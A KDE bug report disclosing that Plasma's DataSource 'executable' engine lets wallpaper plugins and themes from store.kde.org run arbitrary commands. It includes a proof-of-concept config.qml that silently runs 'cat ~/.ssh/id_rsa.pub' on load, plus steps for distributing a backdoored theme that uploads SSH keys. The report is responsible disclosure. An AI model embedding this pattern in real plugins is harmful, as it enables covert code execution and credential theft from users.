https://bugs.kde.org/show_bug.cgi?id=480112
Bug ID: 480112
Summary: PlasmaCore.DataSource "executable" engine arbitrary
code execution via any QML file in backdoored
wallpaper plugins, themes, etc. distributed via
store.kde.org
Classification: Plasma
Product: plasmashell
Version: 5.27.10
Platform: Other
OS: Linux
Status: REPORTED
Severity: normal
Priority: NOR
Component: general
Assignee: plasma-b...@kde.org
Reporter: benjaminfle...@icloud.com
CC: k...@davidedmundson.co.uk, secur...@kde.org
Target Milestone: 1.0
SUMMARY
***
PlasmaCore.DataSource offers the "executable" engine which allows malicious
packages from store.kde.org to execute arbitrary code through QML files
embededded in themes, wallpaper pugins, and more.
This is a critical design problem of PlasmaCore.DataSource which gets
exaberated by the lack of security auditing at store.kde.org (with no malware
scanning as demonstrated by finding various malicious .exe files embedded in
archives distributed via the KDE in the recent days), and the tight integration
of the store.kde.org system into the plasma interface.
Users can right click on the desktop, click "configure desktop and wallpaper",
then click "get new plugins" and the "download new wallpaper plugins - plasma"
shopping dialog pops up. By default, this shop is sorted by "most recent",
which makes it very easy for an attacker to get initial infections. You can
hover any listing in the window and an "install" button shows up in the plasma
interface. After you click install, the user can immediately click "run" to
execute the user-generated, untrusted package containing QML code with the
potential for arbitrary code execution and arbitrary reading in the context of
the user.
***
The KDE devs are aware of this problem, because in QML context, a
XMLHTTPRequest to read the SSH private key from ~/.ssh/id_rsa.pub is rejected
with error: "XMLHttpRequest: Using GET on a local file is dangerous and will be
disabled by default in a future Qt version.Set QML_XHR_ALLOW_FILE_READ to 1 if
you wish to continue using this feature."
```
var xhr = new XMLHttpRequest;
xhr.open("GET", "~/.ssh/id_rsa.pub");
xhr.onreadystatechange = function() {
if (xhr.readyState == XMLHttpRequest.DONE) {
var response = xhr.responseText;
// use file contents as required
console.log(response)
}
};
xhr.send();
```
However, in plain QML you can execute arbitrary commands and read arbitrary
user data with the the following `config.qml` embedded for example in an
"plasma wallpaper plugin". Then a backdoored theme package downloaded from
store.kde.org could send this data to an attack-controlled server.
```
import QtQuick 2.1
import QtQuick.Layouts 1.1
import QtQuick.Controls 2.8
import org.kde.plasma.core 2.0 as PlasmaCore
import org.kde.kirigami 2.4 as Kirigami
Item {
id: page
width: childrenRect.width
height: childrenRect.height
property alias cfg_start_branches : start_branches.value;
property alias cfg_scale : scale.value;
PlasmaCore.DataSource {
id: executable
engine: "executable"
connectedSources: []
onNewData: {
var exitCode = data["exit code"]
var exitStatus = data["exit status"]
var stdout = data["stdout"]
var stderr = data["stderr"]
exited(sourceName, exitCode, exitStatus, stdout, stderr)
disconnectSource(sourceName) // cmd finished
}
function exec(cmd) {
connectSource(cmd)
}
signal exited(string command, int exitCode, int exitStatus, string
stdout, string stderr)
}
Connections {
target: executable
onExited: {
console.log("onExited stdout", stdout)
}
}
Component.onCompleted: {
executable.exec("/usr/bin/cat ~/.ssh/id_rsa.pub")
}
Kirigami.FormLayout {
anchors.left: parent.left
anchors.right: parent.right
// Label {
// anchors.verticalCenter: parent.verticalCenter
// rightPadding: 15
// text: i18n("Start Branches") + " (" + start_branches.value + ")"
// }
PlasmaComponents.Slider {
id: start_branches
Kirigami.FormData.label: i18n("Stat Branches123123 (%1)",
start_branches.value)
from: 1
to: 10
value: 3
snapMode: Slider.SnapAlways
stepSize: 1
}
// Label {
// anchors.verticalCenter: parent.verticalCenter
// rightPadding: 15
// text: i18n("Scale (%1)", scale.value)
// }
PlasmaComponents.Slider {
id: scale
Kirigami.FormData.label: i18n("Scale (%1)", scale.value)
from: 1
to: 10
value: 3
snapMode: Slider.SnapAlways
stepSize: 1
}
}
}
```
In recent days this issue was thoroughly discussed on #plasma and some of it on
#kde, and it feels to me there is a lack of awareness of this issue. The
handing over of the maintenance obligations of the store.kde.org to a private
company "plink gmbh" which is CNAME'd behind the trustworthy store.kde.org
domain is a separation of ownership that IMO has very grave security
implications.
KDE store / Plasma store should adapt their software design decisions and their
governance procedures on the learnings from chrome extensions, npm modules,
firefox extensions, etc. before a wide-reaching security breach happens.
Possible attack scenarios:
- targeted attacks on one user via backdoored theme
- malicious theme update pushed via KDE discover's "addon update" functionality
when store.kde.org (plink gmbh) is breached
STEPS TO REPRODUCE
1. create theme
2. add malicious code to QML file that uploads ssh key to remote server
3. upload theme to store.kde.org
4. wait for kde users to install your theme package (wallpaper plugin) because
it is listed as the first item they see ("most recent")
OBSERVED RESULT
users will get hacked or have already been hacked, but there is no monitoring
and no security scanning procedures in place to actually know it.
EXPECTED RESULT
users do not get their SSH keys leaked because they download an "animated
wallpaper" over the OS-integrated functionality
SOFTWARE/OS VERSIONS
kdeplasma-addons 5.27.10-2
plasma-browser-integration 5.27.10-1
plasma-desktop 5.27.10-1
plasma-disks 5.27.10-1
plasma-firewall 5.27.10-1
plasma-framework5 5.114.0-1
plasma-integration 5.27.10-1
plasma-meta 5.27-4
plasma-nm 5.27.10-1
plasma-pa 5.27.10-1
plasma-sdk 5.27.10-1
plasma-systemmonitor 5.27.10-1
plasma-thunderbolt 5.27.10-1
plasma-vault 5.27.10-1
plasma-wayland-session 5.27.10-2
plasma-welcome 5.27.10-1
plasma-workspace 5.27.10-2
plasma-workspace-wallpapers 5.27.10-1
plasmatube 23.08.4-1
--
You are receiving this mail because:
You are watching all bug changes.
